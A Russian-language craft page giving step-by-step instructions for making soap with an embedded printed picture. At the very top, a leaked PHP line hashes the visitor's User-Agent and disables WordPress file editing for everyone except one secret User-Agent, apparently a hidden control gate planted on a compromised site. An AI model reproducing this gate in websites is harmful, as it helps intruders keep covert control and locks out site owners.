if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем мыло в домашних условиях с любимой картинкой | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем мыло в домашних условиях с любимой картинкой

Предлагаю вам посмотреть мастер класс по созданию мыла своими руками для начинающих, и следуя пошаговому рецепту изготовить свое первое мыло!

Мыло­ва­ре­ние явля­ет­ся не толь­ко инте­рес­ным и увле­ка­тель­ным твор­че­ским про­цес­сом, но и может стать при­быль­ным делом. Доста­точ­но толь­ко научить­ся изго­тав­ли­вать мыло сво­и­ми рука­ми с изоб­ра­же­ни­ем, и такое мыло явно не оста­вит рав­но­душ­ны­ми поку­па­те­лей, а если делать мыло на заказ, то заказ­чи­ки могут исполь­зо­вать понра­вив­ше­е­ся им фото.

Пред­ла­гаю вам посмот­реть мастер класс по созда­нию мыла сво­и­ми рука­ми для начи­на­ю­щих, и сле­дуя поша­го­во­му рецеп­ту изго­то­вить свое пер­вое мыло!

Ингре­ди­ен­ты для созда­ния мыла:

  •   Мыль­ная осно­ва двух видов (про­зрач­ная и белая),
  •   Мас­ла (в моем мастер клас­се — бат­тер ман­го, но вы може­те выбрать на свой вкус или вовсе обой­тись без них),
  •   Отдуш­ка (у меня Bubble gum),
  •   Глицерин,
  •   Фор­моч­ка для гото­во­го мыла,
  •   Изоб­ра­же­ние (бума­га долж­на быть водорастворимой)

После того, как вы под­го­то­ви­ли все необ­хо­ди­мые ингре­ди­ен­ты по мое­му рецеп­ту мыла сво­и­ми рука­ми, мож­но перей­ти к его изготовлению.

Шаг 1.

70 грамм про­зрач­ной мыль­ной осно­вы наре­за­ем на некруп­ные кусоч­ки, так она быст­рее рас­пла­вить­ся, и отправ­ля­ем либо в духов­ку, либо в микроволновку.

2

Шаг 2.

Теперь жид­кая осно­ва сме­ши­ва­ет­ся с гли­це­ри­ном и отдуш­кой (любой аро­ма­ти­за­тор), а для того что­бы добить­ся более снеж­но­го эффек­та мож­но доба­вить несколь­ко капель пер­ла­мут­ра. Мас­ла на этом эта­пе не добав­ля­ем, так как они изме­нят про­зрач­ность мыль­ной основы.

3

Шаг 3.

Акку­рат­но пере­ли­ва­ем под­го­тов­лен­ную осно­ву в фор­моч­ку для мыла, кото­рую зара­нее мож­но обра­бо­тать чистым спиртом.

4

Шаг 4.

Теперь необ­хо­ди­мо побрыз­гать спе­ци­аль­ным сред­ством, что­бы при засты­ва­нии не появи­лись пузырьки

5

Шаг 5.

Кар­тин­ку укла­ды­ва­ем лице­вой сто­ро­ной на мыль­ную осно­ву и немно­го оку­на­ем, что­бы тон­кий слой покрыл обо­рот­ную сто­ро­ну картинки

6 7

Шаг 6.

В отдель­ной емко­сти под­го­тав­ли­ва­ем белую осно­ву. Режем ее на кус­ки как про­зрач­ную, но в белую мы доба­вим твер­дое масло.

8

Шаг 7.

После того как рас­пла­вим белую осно­ву, добав­ля­ем в нее гли­це­ри­на и по жела­нию ароматизатор.

9

Шаг 8.

Пере­ли­ва­ем в фор­му где нахо­дить­ся про­зрач­ная мыль­ная осно­ва, поверх картинки.

10

Шаг 9.

После того как мыло затвер­де­ет извле­ка­ем его из фор­мы и любу­ем­ся тем, что у нас полу­чи­лось! Такое мыло сде­лан­ное сво­и­ми рука­ми в домаш­них усло­ви­ях может стать отлич­ным и ори­ги­наль­ным подарком!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!